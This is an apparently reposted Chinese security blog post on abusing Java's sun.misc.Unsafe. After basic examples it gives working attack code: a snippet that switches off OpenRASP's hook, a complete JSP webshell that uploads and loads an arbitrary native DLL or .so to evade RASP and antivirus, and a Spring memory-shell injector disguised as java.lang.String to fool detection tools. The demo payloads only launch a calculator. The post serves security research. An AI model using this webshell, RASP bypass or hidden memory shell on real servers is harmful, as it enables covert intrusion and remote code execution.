當(dāng)前位置：首頁 > 编程语言 > java >内容正文

java

Java中的Unsafe在安全领域的一些应用总结和复现

發(fā)布時(shí)間：2023/12/9 java 32 豆豆

生活随笔收集整理的這篇文章主要介紹了 Java中的Unsafe在安全领域的一些应用总结和复现小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

Python微信訂餐小程序課程視頻

https://edu.csdn.net/course/detail/36074

Python實(shí)戰(zhàn)量化交易理財(cái)系統(tǒng)

https://edu.csdn.net/course/detail/35475
目錄* 0 前言

1 基本使用
- 1.1 內(nèi)存級(jí)別修改值
- 1.2 創(chuàng)建對(duì)象
- 1.3 創(chuàng)建VM Anonymous Class
2 利用姿勢
- 2.1 修改值以關(guān)閉RASP等防御措施
- 2.2 創(chuàng)建NativeLibrary對(duì)象實(shí)現(xiàn)webshell
- 2.3 匿名的內(nèi)存馬
- 2.4 shellcode和instrumentation對(duì)象構(gòu)建
3 總結(jié)
參考：

0 前言

unsafe里面有很多好用的方法，比如allocateInstance可以直接創(chuàng)建實(shí)例對(duì)象，defineAnonymousClass可以創(chuàng)建一個(gè)VM匿名類(VM Anonymous Class)，以及直接從內(nèi)存級(jí)別修改對(duì)象的值。

1 基本使用

首先是獲取Unsafe對(duì)象，一般使用反射獲取Unsafe，否則會(huì)被Java安全機(jī)制攔截，代碼如下

public static Unsafe getUnsafe() throws Exception{Class aClass = Class.forName("sun.misc.Unsafe");Constructor declaredConstructor = aClass.getDeclaredConstructor();declaredConstructor.setAccessible(true);Unsafe unsafe= (Unsafe) declaredConstructor.newInstance();return unsafe;}

1.1 內(nèi)存級(jí)別修改值

這里首先要提到的是，在jvm中，對(duì)實(shí)例的Field進(jìn)行了有規(guī)律的存儲(chǔ)，具體可見JVM相關(guān)知識(shí)，而通過一個(gè)偏移量可以從內(nèi)存中找到相應(yīng)的Field值。在Unsafe中獲取偏移量的方法是staticFieldOffset(Field var1)和objectFieldOffset(Field var1)這兩個(gè)方法，輸入一個(gè)Field對(duì)象后，會(huì)返回該Field在其相應(yīng)的類中的內(nèi)存偏移量是多少。通過獲得的偏移量可進(jìn)一步調(diào)用putInt、putLong、putObject等方法對(duì)實(shí)例的field進(jìn)行修改。

例如：

package com.bitterz.unsafe;import sun.misc.Unsafe; import java.lang.reflect.Constructor; import java.lang.reflect.Field;public class UnsafeTest {private int a = 1;private String string = "whoami";public UnsafeTest(){}public void test(){ }public static void main(String[] args) throws Exception {Unsafe unsafe = getUnsafe();UnsafeTest unsafeTest = new UnsafeTest();// 修改intField f = Class.forName("com.bitterz.unsafe.UnsafeTest").getDeclaredField("a");long l = unsafe.objectFieldOffset(f);unsafe.putInt(unsafeTest, l, 9999);System.out.println(unsafeTest.a);// 修改stringField f2 = Class.forName("com.bitterz.unsafe.UnsafeTest").getDeclaredField("string");long l2 = unsafe.objectFieldOffset(f2);unsafe.putObject(unsafeTest, l2, "bitterz");System.out.println(unsafeTest.string);}public static Unsafe getUnsafe() throws Exception{Class aClass = Class.forName("sun.misc.Unsafe");Constructor declaredConstructor = aClass.getDeclaredConstructor();declaredConstructor.setAccessible(true);Unsafe unsafe= (Unsafe) declaredConstructor.newInstance();return unsafe;} }

其輸出結(jié)果為

但對(duì)final和static修飾的field這種修改方法無效。另外還可以通過偏移量使用getInt()、getObject()等方法獲取實(shí)例的field值，這種方法也可以作為反射被限制時(shí)的一種繞過。

1.2 創(chuàng)建對(duì)象

Unsafe中有個(gè)allocateInstance方法，可以無視構(gòu)造方法，直接利用類對(duì)象構(gòu)建實(shí)例，這種方法往往能夠減少反射創(chuàng)建實(shí)例時(shí)可能遇到的各種阻礙，比如類的依賴關(guān)系。

比如前面創(chuàng)建Unsafe時(shí)使用了反射，不能直接進(jìn)行創(chuàng)建，那么可以使用unsafe進(jìn)行創(chuàng)建(只是為了演示。。)

1.3 創(chuàng)建VM Anonymous Class

VM Anonymous Class并不等同于匿名類，這種類具有以下幾個(gè)特點(diǎn)(摘自https://paper.seebug.org/1785)：

1、class名可以是已存在的class的名字，比如java.lang.File，即使如此也不會(huì)發(fā)生任何問題，java的動(dòng)態(tài)編譯特性將會(huì)在內(nèi)存中生成名如 java.lang.File/13063602@38ed5306的class。 ---將會(huì)使類名極具欺騙性 2、該class的classloader為null。 ---在java中classloader為null的為來自BootstrapClassLoader的class，往往會(huì)被認(rèn)定為jdk自帶class 3、在JVM中存在大量動(dòng)態(tài)編譯產(chǎn)生的class（多為lamada表達(dá)式生成），這種class均不會(huì)落盤，所以不落盤并不會(huì)屬于異常特征。 4、無法通過Class.forName()獲取到該class的相關(guān)內(nèi)容。 ---嚴(yán)重影響通過反射排查該類安全性的檢測工具 5、在部分jdk版本中，VM Anonymous Class甚至無法進(jìn)行restransform。 ---這也就意味著我們無法通過attach API去修復(fù)這個(gè)惡意類 6、該class在transform中的className將會(huì)是它的模板類名。 ---這將會(huì)對(duì)那些通過attach方式檢測內(nèi)存馬的工具造成極大的誤導(dǎo)性

使用方法如下

defineAnonymousClass方法的第一個(gè)參數(shù)隨便傳入一個(gè)類對(duì)象即可，第二個(gè)參數(shù)需要傳入一個(gè)類的字節(jié)碼，這里使用javassist簡單一點(diǎn)。第三個(gè)參數(shù)設(shè)置為null即可。

執(zhí)行后得到一個(gè)類對(duì)象，通過newInstance獲取實(shí)例，再調(diào)用了匿名類的toString方法，彈個(gè)計(jì)算器。而后輸出匿名類的類名和Unsafe的類名進(jìn)行對(duì)比，可見，用defineAnonymousClass創(chuàng)建的類名后面，會(huì)有"/xxxxxxxx"，這里也算一個(gè)特征，但通過Class.forName是無法獲取到這個(gè)類的，所以下面報(bào)錯(cuò)了。

用attach的方式，看看對(duì)該類的檢測，之前寫過rasp相關(guān)的筆記，所以直接拿過來用

transform里面拿到到該類后，直接報(bào)錯(cuò)了，看了一下報(bào)錯(cuò)日志，實(shí)際上就是在transform中返回字節(jié)碼時(shí)出問題了，因?yàn)榍懊嬉舱f了在部分jdk中，VM AnonymousClass是不能被retransform的，我這里用的是jdk1.8u40。但是直接結(jié)束程序有點(diǎn)不太好，例如插入內(nèi)存馬后，目標(biāo)使用attach機(jī)制來掃描jvm中加載的類，此時(shí)直接導(dǎo)致Web程序崩潰，業(yè)務(wù)不得提刀來殺安全：）這個(gè)點(diǎn)用于內(nèi)存馬可能要慎重一下。

2 利用姿勢

2.1 修改值以關(guān)閉RASP等防御措施

前面提到了，通過Unsafe可以直接修改值，因此在遇到目標(biāo)有RASP得情況下，可以考慮修改RASP的開關(guān)；

try {Class clazz = Class.forName("com.baidu.openrasp.HookHandler");Unsafe unsafe = getUnsafe();InputStream inputStream = clazz.getResourceAsStream(clazz.getSimpleName() + ".class");byte[] data = new byte[inputStream.available()];inputStream.read(data);Class anonymousClass = unsafe.defineAnonymousClass(clazz, data, null);Field field = anonymousClass.getDeclaredField("enableHook");unsafe.putObject(clazz, unsafe.staticFieldOffset(field), new AtomicBoolean(false));} catch (Exception e) {}

或者使用rebeyond師傅提到的方法，手動(dòng)構(gòu)建insturmentation對(duì)象，然后對(duì)執(zhí)行命令的類去掉RASP插樁代碼。

2.2 創(chuàng)建NativeLibrary對(duì)象實(shí)現(xiàn)webshell

這里的思路來自于SummerSec師傅的文章，通過java.lang.ClassLoader$NativeLibrary#load(String, Boolean)方法，加載一個(gè)dll文件，而dll文件中可以實(shí)現(xiàn)各種攻擊手段，例如上傳了一個(gè)jsp文件，只用于加載dll，而不同的dll實(shí)現(xiàn)了內(nèi)網(wǎng)穿透、反彈Shell、木馬和執(zhí)行命令等功能，攻擊時(shí)上傳對(duì)應(yīng)dll文件即可。

借鑒https://github.com/SummerSec/Loader/blob/main/AddDllDemo.jsp ，又稍微改了一下代碼，把上傳文件和加載dll融合到了一個(gè)jsp里面

<%@page pageEncoding="utf-8"%> "file" id="fielinput" /> ![]()"txshow" style="width:100px;height:100px;"/> 解析之后的base64數(shù)據(jù)： "data">"utf-8">"http://127.0.0.1:8080/test/AddDllDemo.jsp" method="POST">"text" style="width:1300px;height:100px;font-size:30px" name="p"/>"submit" value="提交"/>"text/javascript">var input = document.getElementById("fielinput"); input.addEventListener('change', readFile, false); function readFile() {var file = this.files[0];var reader = new FileReader(); // 返回一個(gè)新的FileReader函數(shù)reader.readAsDataURL(file);reader.onload = function (e) {txshow.src = this.result;document.getElementById("data").innerText=this.result.substring(this.result.indexOf(',')+1);} } ><% if(request.getMethod().equals("GET")){}else{String p = request.getParameter("p");String t = request.getServletContext().getRealPath("/");java.io.PrintWriter outp = response.getWriter();outp.println("WebRootPath:");outp.println(t);t = request.getServletPath();outp.println("ServletPath:");outp.println(t);t = (new java.io.File(".").getAbsolutePath());outp.println("WebServerPath:");outp.println(t);java.util.Random random = new java.util.Random(System.currentTimeMillis());outp.println("if Dynamic Link Library will be auto load in uploading !!!");t = System.getProperty("os.name").toLowerCase();if (t.contains("windows")) {t = "C:/Windows/temp/dm" + random.nextInt(10000000) + "1.dll";}else {t = "/tmp/dm" + random.nextInt(10000000) + "1.so";}if (p != null) {try {java.io.FileOutputStream fos = new java.io.FileOutputStream(new java.io.File(t));fos.write(D(p));fos.close();N(t);outp.println("Dynamic Link Library is uploaded, and the path is: " + t);outp.println("load uploaded success !!!");} catch (Exception e) {outp.println(e.getMessage());}}outp.flush();outp.close(); }%><%!private void N(String t) throws Exception {Object o;Class a = Class.forName("java.lang.ClassLoader$NativeLibrary");try {java.lang.reflect.Constructor c = a.getDeclaredConstructor(new Class[]{Class.class,String.class,boolean.class});c.setAccessible(true);o = c.newInstance(Class.class,t,true);}catch (Exception e){Class u = Class.forName("sun.misc.Unsafe");java.lang.reflect.Constructor c = u.getDeclaredConstructor();c.setAccessible(true);sun.misc.Unsafe un = (sun.misc.Unsafe)c.newInstance();o = un.allocateInstance(a);}java.lang.reflect.Method method = o.getClass().getDeclaredMethod("load", String.class, boolean.class);method.setAccessible(true);method.invoke(o, t, false);}private byte[] D(String p) throws Exception {try {Class clazz = Class.forName("sun.misc.BASE64Decoder");return (byte[])(clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), p));} catch (Exception var5) {Class clazz = Class.forName("java.util.Base64");Object decoder = clazz.getMethod("getDecoder").invoke(null);return (byte[])(decoder.getClass().getMethod("decode", String.class).invoke(decoder, p));}} %>

瀏覽器訪問AddDllDemo.jsp后，選擇dll文件，并復(fù)制base64值到文本框中，點(diǎn)擊提交

成功彈出計(jì)算器

使用Unsafe去創(chuàng)建NativeLibrary的有點(diǎn)在于可以減少在java層面的調(diào)用，直接一個(gè)load方法就能實(shí)現(xiàn)native層面的代碼執(zhí)行，可以繞過RASP或終端軟件對(duì)webshell的查殺，以及java層面執(zhí)行命令時(shí)被攔截的可能。

目前這種做法有個(gè)缺點(diǎn)在于DLL文件必須落地，顯然落地就有可能被文件監(jiān)控察覺到。另外實(shí)現(xiàn)這種做法的還有ClassLoader#loadLibrary和ClassLoader#loadLibrary0，利用反射即可實(shí)現(xiàn)不再贅述。期待大師傅們搞出無文件落地的姿勢！

2.3 匿名的內(nèi)存馬

前面提到了使用Unsafe.defineAnonymousClass方法可以創(chuàng)建一個(gè)VM Anonymous Class，基于其各種特點(diǎn)，可以讓內(nèi)存馬隱藏的更深

在springmvc中，插入servlet內(nèi)存馬時(shí)，只需要傳入方法名和惡意類的實(shí)例對(duì)象，剛好適合這種Anonymous Class，pom.xml設(shè)置如下

<dependency><groupId>org.springframeworkgroupId><artifactId>spring-webartifactId><version>4.2.6.RELEASEversion> dependency> <dependency><groupId>org.springframeworkgroupId><artifactId>spring-webmvcartifactId><version>4.2.6.RELEASEversion> dependency> <dependency><groupId>org.springframeworkgroupId><artifactId>spring-contextartifactId><version>4.2.6.RELEASEversion> dependency> <dependency><groupId>org.springframeworkgroupId><artifactId>spring-testartifactId><version>4.2.6.RELEASEversion> dependency> <dependency><groupId>org.springframeworkgroupId><artifactId>spring-jdbcartifactId><version>4.2.6.RELEASEversion> dependency> <dependency><groupId>org.javassistgroupId><artifactId>javassistartifactId><version>3.19.0-GAversion> dependency>

在spring_mvc中寫個(gè)controller來注入，示例代碼如下：

@ResponseBody @RequestMapping(value = "/index", method = RequestMethod.GET) public String index(HttpServletRequest request, HttpServletResponse response) throws Exception {// 準(zhǔn)備unsafe和匿名類Class aClass = Class.forName("sun.misc.Unsafe");Constructor declaredConstructor = aClass.getDeclaredConstructor();declaredConstructor.setAccessible(true);Unsafe unsafe= (Unsafe) declaredConstructor.newInstance();ClassPool classPool = ClassPool.getDefault();CtClass ctClass = classPool.makeClass("java.lang.String");CtMethod toString = CtMethod.make("public String toString(){java.lang.Runtime.getRuntime().exec(\"calc\");return null;}", ctClass);toString.setName("toString");ctClass.addMethod(toString);byte[] bytes = ctClass.toBytecode();Class anonymousClass = unsafe.defineAnonymousClass(File.class, bytes, null);// 插入內(nèi)存馬WebApplicationContext context = (WebApplicationContext) RequestContextHolder.currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0);// 1. 從當(dāng)前上下文環(huán)境中獲得 RequestMappingHandlerMapping 的實(shí)例 beanRequestMappingHandlerMapping mappingHandlerMapping = context.getBean(RequestMappingHandlerMapping.class);AbstractHandlerMethodMapping abstractHandlerMethodMapping = context.getBean(AbstractHandlerMethodMapping.class);Method method = Class.forName("org.springframework.web.servlet.handler.AbstractHandlerMethodMapping").getDeclaredMethod("getMappingRegistry");method.setAccessible(true);Object mappingRegistry = (Object) method.invoke(abstractHandlerMethodMapping);Field field = Class.forName("org.springframework.web.servlet.handler.AbstractHandlerMethodMapping$MappingRegistry").getDeclaredField("urlLookup");field.setAccessible(true);Map urlLookup = (Map) field.get(mappingRegistry);Iterator urlIterator = urlLookup.keySet().iterator();String injectUrlPath = "/malicious"; // 插入的urlwhile (urlIterator.hasNext()){String urlPath = (String) urlIterator.next();if (injectUrlPath.equals(urlPath)){System.out.println("URL已存在");return "exist";}}// 2. 通過反射獲得自定義 controller 中唯一的 Method 對(duì)象Method method2 = anonymousClass.getDeclaredMethod("toString");// 3. 定義訪問 controller 的 URL 地址PatternsRequestCondition url = new PatternsRequestCondition(injectUrlPath);// 4. 定義允許訪問 controller 的 HTTP 方法（GET/POST）RequestMethodsRequestCondition ms = new RequestMethodsRequestCondition();// 5. 在內(nèi)存中動(dòng)態(tài)注冊(cè) controllerRequestMappingInfo info = new RequestMappingInfo(url, ms, null, null, null, null, null);// InjectAnonymousClass InjectAnonymousClass = new InjectAnonymousClass("aaa");Object o = anonymousClass.newInstance();mappingHandlerMapping.registerMapping(info, o, method2);return "injected!"; // 這里根據(jù)注解會(huì)自動(dòng)返回index.html }

啟動(dòng)項(xiàng)目，然后訪問該controller對(duì)應(yīng)的url，結(jié)果如下

注入成功，訪問/malicious

由于惡意代碼里面只寫了彈計(jì)算器，并沒有寫返回語句，所以tomcat尋找malicious.jsp會(huì)返回404。調(diào)試模式下看一下對(duì)該url的描述

只有在beanType處顯示類名為java.lang.String/179284069，其它地方都顯示為java.lang.String。匿名類的類名又可以隨意設(shè)置，所以稍加修飾即可以假亂真，比如先拿到org.springframework.web.servlet.handler.AbstractHandlerMethodMapping$MappingRegistry，遍歷其中，隨便找一個(gè)controller的類名和方法名，然后回顯一下，再給惡意類寫個(gè)一樣的package和方法名，url則根據(jù)Web應(yīng)用的規(guī)律自己編一個(gè)，這樣的話，還是能夠欺騙到根據(jù)package和方法名判斷的檢測方法，另外VM Anonymous Class沒辦法獲取到字節(jié)碼，所以也能逃過一劫。

2.4 shellcode和instrumentation對(duì)象構(gòu)建

Unsafe類還能對(duì)內(nèi)存進(jìn)行操作，在rebeyond師傅的文章-java內(nèi)存攻擊技術(shù)漫談中有大量應(yīng)用，最終可以通過內(nèi)存級(jí)別的操作，直接構(gòu)建instrumentation對(duì)象進(jìn)而修改jvm中的java代碼；或者執(zhí)行shellcode，從而繞過RASP實(shí)現(xiàn)命令執(zhí)行、文件讀寫等操作。

3 總結(jié)

Unsafe在java攻擊層面屬實(shí)非常有用，而其正常使用也非常廣泛，例如gson反序列化時(shí)，直接使用allocateInstance創(chuàng)建對(duì)象，無視構(gòu)造函數(shù)的復(fù)雜。Unsafe還有很多其它功能，不夠安全人員可能用的比較少，我也借用一下這張傳的最廣泛的圖：）

參考：

https://paper.seebug.org/1785

https://tttang.com/archive/1436/

https://blog.csdn.net/rebeyond/p/15162264.html

總結(jié)

以上是生活随笔為你收集整理的Java中的Unsafe在安全领域的一些应用总结和复现的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。

上一篇： Linux服务器上监控网络带宽与监控性能
下一篇： Java 基础——数组解析